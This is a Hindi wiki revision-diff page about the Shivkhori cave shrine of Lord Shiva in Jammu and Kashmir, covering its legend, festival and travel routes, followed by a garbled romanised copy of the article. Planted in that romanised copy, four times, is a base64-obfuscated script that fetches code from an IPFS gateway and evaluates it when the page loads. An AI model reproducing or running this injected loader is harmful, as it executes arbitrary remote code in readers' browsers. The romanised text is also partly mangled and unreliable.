Difference between revisions of "शिवखोड़ी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "काफी" to "काफ़ी")
Line 1: Line 1:
{{tocright}}
+
[[चित्र:Shivkhori-Cave.jpg|thumb|250px|शिवखोड़ी गुफ़ा]]
शिवखोड़ी गुफ़ा [[जम्मू और कश्मीर|जम्मू - कश्मीर राज्य]] के 'रयसी जिले' में स्थित है। यह [[शिव|भगवान शिव]] के प्रमुख पूजनीय स्थलो में से एक है। यह पवित्र गुफ़ा 150 मीटर लंबी है। इस गुफ़ा के अन्‍दर भगवान शंकर का 4 फीट ऊंचा [[शिवलिंग]] है। इस शिवलिंग के ऊपर पवित्र जल की धारा सदैव गिरती रहती है। यह एक प्राकृतिक गुफ़ा है। इस गुफ़ा के अंदर अनेक देवी -[[देवता|देवताओं]] की मनमोहक आकृतियां है।  इन आकृतियों को देखने से दिव्य आंनद की प्राप्ति होती है। शिवखोड़ी गुफ़ा को [[हिंदू]] देवी-देवताओं के घर के रूप में भी जाना जाता है।  
+
शिवखोड़ी गुफ़ा [[जम्मू और कश्मीर|जम्मू - कश्मीर राज्य]] के '[[रयसी ज़िला|रयसी ज़िले]]' में स्थित है। यह [[शिव|भगवान शिव]] के प्रमुख पूजनीय स्थलो में से एक है। यह पवित्र गुफ़ा 150 मीटर लंबी है। शिवखोड़ी गुफ़ा के अन्‍दर भगवान शंकर का 4 फीट ऊंचा [[शिवलिंग]] है। इस शिवलिंग के ऊपर पवित्र जल की धारा सदैव गिरती रहती है। यह एक प्राकृतिक गुफ़ा है। इस गुफ़ा के अंदर अनेक देवी -[[देवता|देवताओं]] की मनमोहक आकृतियां है।  इन आकृतियों को देखने से दिव्य आंनद की प्राप्ति होती है। शिवखोड़ी गुफ़ा को [[हिंदू]] देवी-देवताओं के घर के रूप में भी जाना जाता है।  
  
==अर्थ==
 
==अर्थ==
 +
{{tocright}}
 
[[पहाड़ी भाषा]] में गुफ़ा को 'खोड़ी' कहते है। इस प्रकार पहाड़ी भाषा में 'शिवखोड़ी' का अर्थ होता है- भगवान शिव की गुफ़ा।
 
[[पहाड़ी भाषा]] में गुफ़ा को 'खोड़ी' कहते है। इस प्रकार पहाड़ी भाषा में 'शिवखोड़ी' का अर्थ होता है- भगवान शिव की गुफ़ा।
 
Line 27: Line 28:
  
==पौराणिक कथाएँ==  
 
==पौराणिक कथाएँ==  
 
====भस्मासुर की कथा====   
 
====भस्मासुर की कथा====   
 
इस गुफ़ा के संबंध में अनेक कथाएं प्रसिद्ध है। इन कथाओं में भस्मासुर से संबंधित कथा सबसे अधिक प्रचलित है। भस्मासुर असुर जाति का था। उसने भगवान शंकर की घोर तपस्या की थी। जिससे प्रसन्‍न होकर भगवान शंकर ने उसे वरदान दिया था कि वह जिस व्यक्ति के सिर पर हाथ रखेगा वह भस्‍म हो जाएगा। वरदान प्राप्ति के बाद वह ऋषि-मुनियो पर अत्याचार करने लगा। उसका अत्याचार इतना बढ़ गया था कि देवता भी उससे डरने लगे थे। देवता उसे मारने का उपाय ढूढ़ने लगे। इसी उपाय के अंतर्गत नारद मुनि ने उसे देवी पार्वती का अपहरण करने के लिए प्रेरित किया। [[नारद मुनि]] ने भस्मासुर से कहा, वह तो अति बलवान है। इसलिए उसके पास तो पार्वती जैसी सुन्दरी होनी चाहिए जो कि अति सुन्दर है। भस्मासुर के मन में लालच आ गया और वह पार्वती को पाने की इच्छा से भगवान शंकर के पीछे भागा। शंकर ने उसे अपने पीछे आता देखा तो वह पार्वती और नंदी को साथ में लेकर भागे। और फिर शिव खोड़ी के पास आकर रूक गए। यहाँ भस्मासुर और भगवान शंकर के बीच में युद्ध प्रारंभ हो गया। यहाँ पर युद्ध होने के कारण ही इस स्थान का नाम '''रनसू''' पड़ा। '''रन का मतलब युद्ध और सू का मतलब भूमि होता है।''' इसी कारण इस स्थान को रनसू कहा जाता है। रनसू शिव खोड़ी यात्रा का बेस कैम्प है। अपने ही दिए हुए वरदान के कारण वह उसे नहीं मार सकते थे। भागवान शंकर ने अपने त्रिशुल से शिव खोड़ी का निमार्ण किया। शंकर भगवान ने माता पार्वती के साथ गुफ़ा में प्रवेश किया और योग साधना में बैठ गये। इसके बाद भगवान [[विष्णु]] ने पार्वती का रूप धारण किया और भस्मासुर के साथ नृत्य करने लगे। नृत्य के दौरान ही उन्होंने अपने सिर पर हाथ रखा उसी प्रकार भस्मासुर ने भी अपने सिर पर हाथ रखा जिस कारण वह भस्म हो गया। इसके पश्चात् भगवान विष्णु ने कामधेनु की मदद से गुफा के अन्दर प्रवेश किया फिर सभी देवी-देवताओं ने वहाँ भगवान शंकर की अराधना की। इसी समय भगवान शंकर ने कहा कि आज से यह स्थान शिव खोड़ी से जाना जायेगा।
 
==प्रमुख त्योहार==
 
==प्रमुख त्योहार==
 +
[[चित्र:Shivkhori.jpg|thumb|[[शिवलिंग]], शिवखोड़ी]]
 
[[महाशिवरात्रि]] का पावन पर्व जो कि भगवान शिव को समर्पित है शिव खोडी में बड़े धूमधाम से मनाया जाता है। हर वर्ष यहाँ पर तीन दिन के मेले का आयोजन किया जाता है। कुछ वर्षो से यहाँ पर आने वाले श्रद्धालुओं की संख्या में काफ़ी वृद्धि हुई है। अलग-अलग राज्यों से आकर श्रद्धालु यहाँ पर भगवान शिव का आशीर्वाद प्राप्त करते हैं। शिवरात्रि का त्योहार [[फरवरी]] के अन्तिम सप्ताह या [[मार्च]] के प्रथम सप्ताह में मनाया जाता हैं।
 
==कैसे पहुँचे==
+
==यातायात और परिवहन==
 
पवित्र गुफ़ा तक पहुँचने का एक रास्ता रनसू गाँव से होकर जाता है। रनसू गाँव जम्मू से सड़क मार्ग द्वारा जुड़ा हुआ है। और जम्मू सभी राज्यों से सड़क, रेल व वायु मार्ग से जुड़ा हुआ है।
 
पवित्र गुफ़ा तक पहुँचने का एक रास्ता रनसू गाँव से होकर जाता है। रनसू गाँव जम्मू से सड़क मार्ग द्वारा जुड़ा हुआ है। और जम्मू सभी राज्यों से सड़क, रेल व वायु मार्ग से जुड़ा हुआ है।
  
Revision as of 12:47, 26 September 2011

thumb|250px|shivakho di gufa shivakho di gufa jammoo - kashmir rajy ke 'rayasi zile' mean sthit hai. yah bhagavan shiv ke pramukh poojaniy sthalo mean se ek hai. yah pavitr gufa 150 mitar lanbi hai. shivakho di gufa ke anh‍dar bhagavan shankar ka 4 phit ooancha shivaliang hai. is shivaliang ke oopar pavitr jal ki dhara sadaiv girati rahati hai. yah ek prakritik gufa hai. is gufa ke aandar anek devi -devataoan ki manamohak akritiyaan hai. in akritiyoan ko dekhane se divy aannad ki prapti hoti hai. shivakho di gufa ko hiandoo devi-devataoan ke ghar ke roop mean bhi jana jata hai.

arth

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

paha di bhasha mean gufa ko 'kho di' kahate hai. is prakar paha di bhasha mean 'shivakho di' ka arth hota hai- bhagavan shiv ki gufa.

sthiti

shivakho di tirthasthal hari-bhari paha diyo ke madhy mean sthit hai. yah ranasoo se 3.5 ki doori par sthit hai. ranasoo shivakho di ka bes kaimp hai. yahaan se paidal yatra kar ap vahaan tak pahuanch sakate haian. ranasoo tahasil rayasi mean ata hai, jo katara se 80 ki.mi. ki doori par sthit hai. katara vaishno devi ki yatra ka bes kaimp hai. jammoo se yah 110 ki.mi. ki doori par sthit hai. jammoo se bas ya kar ke dvara ranasoo tak pahuanch sakate hai. vaishno devi se ane vale yatriyoan ke lie jammoo-kashmir toorijh‍m vibhag ki or se bas suvidha bhi muhaiya karaee jati hai. katara se ranasoo tak ke lie halke vahan bhi upalabdh hai. ranasoo gaanv raiyasi rajauri marg se 6 ki.mi. ki doori par sthit hai.

jammoo se prakritik sauandary ka aannad uthakar shivakho di tak ja sakate hai. jamh‍moo se shiv kho di jane ke raste mean kafi sare manohari drishy milate hai, jo ki yatriyoan ka man moh lete hai. kalakal karate jharane, paha di sundarata adi paryatakoan ko apani or akarshit karate hai.

itihas

pauranik dharmik grantho mean bhi is gufa ke bare mean varnan milata hai. is gufa ko khojane ka shrey ek muslim g dariye ko jata hai. yah g dariya apani khoee huee bakari khojate hue is gufa tak pahuanch gaya. jijnasavash vah gufa ke aandar chala gaya, jahaan usane shivaliang ko dekha. dharmik granthoan ke anusar bhagavan shankar is gufa mean yog mudra mean baithe hue haian. gufa ke andar any devi devataoan ki akriti bhi maujood hai.

gufa ka akar

gufa ka akar bhagavan shankar ke damaroo ke akar ka hai. jis tarah se damaroo donoan taraph se b da hota hai aur bich me se chhota hota hai usi prakar gupha bhi donoan taraph se b di hai aur bich mean chhoti hai. gufa ka muhana 100 mi. chau da hai. parantu aandar ki or badhane par yah sankirn hota jata hai. gufa apane andar kafi sare prakritik sauandary drishy samete hue hai.

gufa ka muhana kafi b da hai. yah 20 phit chau da aur 22 phit ooancha hai. gufa ke muhane par sheshanag ki akriti ke darshan hote hai. amaranath gupha ke saman shivakho di gufa mean bhi kabootar dikh jate haian. sankirn raste se hokar yatri gufa ke mukhy bhag mean pahuanchate haian. gupha ke mukhy sthan par bhagavan shankar ka 4 phit ooancha shivaliang hai. isake thik oopar gay ke char than bane hue hai jinhean kamadhenu ke than kaha jata hai. inamean se nirantar jal girata rahata hai.

shivaliang ke baeean or mata parvati ki akriti hai. yah akriti dhyan ki mudra mean hai. mata parvati ki moorti ke sath hi mean gauri kund hai, jo hamesha pavitr jal se bhara rahata hai. shivaliang ke baeean or hi bhagavan kartikey ki akriti bhi saph dikhaee deti hai. kartikey ki pratima ke oopar bhagavan ganesh ki panchamukhi akriti hai. shivaliang ke pas hi mean ram darabar hai. gufa ke andar hi hinduoan ke 33 karo d devi-devataoan ki akriti bani huee hai. gufa ke oopar ki or chhahamukhi sheshanag, trishul adi ki akriti saph dikhaee deti hai. sath-hi-sath sudarshan chakr ki gol akriti bhi sh‍pashh‍t dikhaee deti hai. gufa ke doosare hisse mean mahalakshmi, mahakali, hasarasvati ke pindi roop mean darshan hote hai.

nau deviyoan ka sthan

agar jito se char kilomitar ki doori par nau deviyoan ka ek sthan hai. ye deviyaan nau piandiyoan ke roop mean ek gupha mean sthit haian. is gupha mean jane ke lie tang rasta hai. isase lagabhag 42 kilomitar door raste mean 'dhanasar' namak sthan hai. yahaan ek shivaliang sthapit hai, us par chaubisoan ghante paha di se booand-booand pani girata rahata hai. is shivaliang par rat din hone vale jalabhishek ko dekhakar shraddhalu chakit rah jate haian. age jane par raste mean chinab nadi ka ek pul ata hai. samarik drishti se mahatvapoorn hone ke karan yahaan suraksha ki vishesh vyavastha rahati hai. vahanoan se ranasoo pahuanchane par vahaan se shivakho di jane ke lie lagabhag sadhe़ tin kilomitar paidal yatra karani p dati hai. is raste ko tay karane ke lie yahaan gho de v palaki ki bhi vyavastha hai.

savadhaniyaan

ranasoo se shivakho di jate samay yatriyoan ko renakot, t aaurch adi apane pas rakhane chahie. ye chijean yahaan kirae par bhi mil jati haian. shraddhalu yahaan se jab shivakho di ke lie age badhate haian, to raste mean ek nadi p dati hai. nadi ka jal doodh jaisa saphed hone ki vajah se ise doodh ganga bhi kahate haian. shivakho di sthan par pahuanchate hi samane ek gufa dikhaee deti hai. gufa mean pravesh karane ke lie lagabhag 60 sidhiyaan chadhani p dati haian. gufa mean pravesh karate hi logoan ke mukh se anayas 'jay ho baba bholenath'-yah udghosh nikalata hai. [1]

pauranik kathaean

bhasmasur ki katha

is gufa ke sanbandh mean anek kathaean prasiddh hai. in kathaoan mean bhasmasur se sanbandhit katha sabase adhik prachalit hai. bhasmasur asur jati ka tha. usane bhagavan shankar ki ghor tapasya ki thi. jisase prasanh‍n hokar bhagavan shankar ne use varadan diya tha ki vah jis vyakti ke sir par hath rakhega vah bhash‍m ho jaega. varadan prapti ke bad vah rrishi-muniyo par atyachar karane laga. usaka atyachar itana badh gaya tha ki devata bhi usase darane lage the. devata use marane ka upay dhoodhane lage. isi upay ke aantargat narad muni ne use devi parvati ka apaharan karane ke lie prerit kiya. narad muni ne bhasmasur se kaha, vah to ati balavan hai. isalie usake pas to parvati jaisi sundari honi chahie jo ki ati sundar hai. bhasmasur ke man mean lalach a gaya aur vah parvati ko pane ki ichchha se bhagavan shankar ke pichhe bhaga. shankar ne use apane pichhe ata dekha to vah parvati aur nandi ko sath mean lekar bhage. aur phir shiv kho di ke pas akar rook ge. yahaan bhasmasur aur bhagavan shankar ke bich mean yuddh praranbh ho gaya. yahaan par yuddh hone ke karan hi is sthan ka nam ranasoo p da. ran ka matalab yuddh aur soo ka matalab bhoomi hota hai. isi karan is sthan ko ranasoo kaha jata hai. ranasoo shiv kho di yatra ka bes kaimp hai. apane hi die hue varadan ke karan vah use nahian mar sakate the. bhagavan shankar ne apane trishul se shiv kho di ka nimarn kiya. shankar bhagavan ne mata parvati ke sath gufa mean pravesh kiya aur yog sadhana mean baith gaye. isake bad bhagavan vishnu ne parvati ka roop dharan kiya aur bhasmasur ke sath nrity karane lage. nrity ke dauran hi unhoanne apane sir par hath rakha usi prakar bhasmasur ne bhi apane sir par hath rakha jis karan vah bhasm ho gaya. isake pashchath bhagavan vishnu ne kamadhenu ki madad se gupha ke andar pravesh kiya phir sabhi devi-devataoan ne vahaan bhagavan shankar ki aradhana ki. isi samay bhagavan shankar ne kaha ki aj se yah sthan shiv kho di se jana jayega.

pramukh tyohar

[[chitr:Shivkhori.jpg|thumb|shivaliang, shivakho di]] mahashivaratri ka pavan parv jo ki bhagavan shiv ko samarpit hai shiv khodi mean b de dhoomadham se manaya jata hai. har varsh yahaan par tin din ke mele ka ayojan kiya jata hai. kuchh varsho se yahaan par ane vale shraddhaluoan ki sankhya mean kafi vriddhi huee hai. alag-alag rajyoan se akar shraddhalu yahaan par bhagavan shiv ka ashirvad prapt karate haian. shivaratri ka tyohar pharavari ke antim saptah ya march ke pratham saptah mean manaya jata haian.

yatayat aur parivahan

pavitr gufa tak pahuanchane ka ek rasta ranasoo gaanv se hokar jata hai. ranasoo gaanv jammoo se s dak marg dvara ju da hua hai. aur jammoo sabhi rajyoan se s dak, rel v vayu marg se ju da hua hai.

vayu marg

shivakho di ka nikatatam havaee adda jammoo mean hai jo ki shivakho di se 110 ki.mi. ki doori par sthit hai. iandiyan eyaralaians, jet eyaraves, eyar sahara v sh‍paisajet ki rojana u dane yahaan ke lie hai.

rel marg

jammoo tak rel dvara pahuanch kar shivakho di tak ja sakate hai. jammoo sabhi rajyoan se rel dvara ju da hua hai. bahut trenean jammoo tak jati hai. garmiyoan ki chhut़htiyoan me rel vibhag dvara vishesh rel yahaan ke lie chalaee jati hai.

s dak marg

ranasoo gaanv, rayasi-rajauri ro d par sthit hai. ranasoo gaanv shiv kho di ka bes kaimp hai. yah vaishno devi katara se bhi s dak marg se ju da hua hai. vaishno devi ke lie lagabhag sabhi rajyoan se bas seva hai. ap yahaan se 80 ki.mi. ki doori tay kar shiv kho di tak pahuanch sakate hai. katara tak jane ke lie bahut si basean upalabdh hai. jammoo-kashmir toorijh‍m vibhag dvara bhi shiv kho di dham ke lie bas suvidha muhaiya karaee jati hai. taiksi aur halke vahano dvara bhi yahaan tak pahuancha ja sakata hai. katara udhamapur aur jammoo se yatri bas, kar, taimpoo aur vain dvara shivakho di tak pahuanch sakate haian.

thaharane ki vyavastha

shraddhaluoan ki sankhya mean vriddhi ko dekhate hue jammoo-kashmir toorijh‍m vibhag dvara yatri nivas ki vyavastha ki gee hai. ye yatri nivas ranasoo gaanv mean hai. ranasoo shivakho di ka bes kaimp hai. yahaan par bahut sankhya mean niji hotal bhi haian. yahaan par apako sabhi suvidhayean mil jayegi.[2]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. man bar-bar kahata hai chal shivakho di (hindi). . abhigaman tithi: 29 agast, 2011.
  2. shivakho di (hindi) yatra salah. abhigaman tithi: 28 agast, 2011.

bahari k diyaan

sanbandhit lekh